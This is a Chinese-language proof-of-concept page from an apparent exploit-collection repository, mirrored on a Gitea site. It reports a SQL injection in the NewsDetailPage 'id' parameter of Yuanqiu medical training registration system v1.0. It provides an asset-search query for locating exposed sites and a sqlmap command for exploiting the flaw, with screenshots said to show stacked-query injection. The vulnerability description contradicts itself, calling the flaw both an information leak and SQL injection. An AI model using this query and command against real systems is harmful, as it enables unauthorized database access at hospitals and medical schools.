admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-11-08 11:57:27 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/远秋医学在线考试系统/远秋医学培训报名系统v1.0NewsDetailPage存在SQL注入漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

30 lines
1.2 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 远秋医学培训报名系统v1.0 NewsDetailPage存在SQL注入漏洞
# 一、漏洞简介
远秋医学在线考试系统采用通用的试题库管理软件适用于各级各类医学院校和医院。远秋医学在线考试系统某接口存在未授权信息泄露漏洞攻击者可利用该漏洞获取数据库敏感信息。远秋医学培训报名系统v1.0 NewsDetailPage存在SQL注入漏洞
# 二、影响版本
+ 远秋医学培训报名系统v1.0
# 三、资产测绘
```plain
title="远秋医学培训报名系统v1.0"
```
![1718993325214-398499d2-2af5-4412-88af-a1260ffee33c.png](./img/22HsGx4nQsThBnpU/1718993325214-398499d2-2af5-4412-88af-a1260ffee33c-296659.png)
# 四、漏洞复现
```java
python3 sqlmap.py -u "http://127.0.0.1/NewsDetailPage.aspx?key=news&id=7" --batch
```
![1718994328603-cd1448e2-a900-4be9-98c7-866fd3dc3120.png](./img/22HsGx4nQsThBnpU/1718994328603-cd1448e2-a900-4be9-98c7-866fd3dc3120-208793.png)
stacked queries
![1718994346902-a7e365cb-368e-4050-9a4e-a1f5527cb372.png](./img/22HsGx4nQsThBnpU/1718994346902-a7e365cb-368e-4050-9a4e-a1f5527cb372-205010.png)
> 更新: 2024-06-23 23:40:49
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/fn5a1ryltdg50eik>
Reference in New Issue View Git Blame Copy Permalink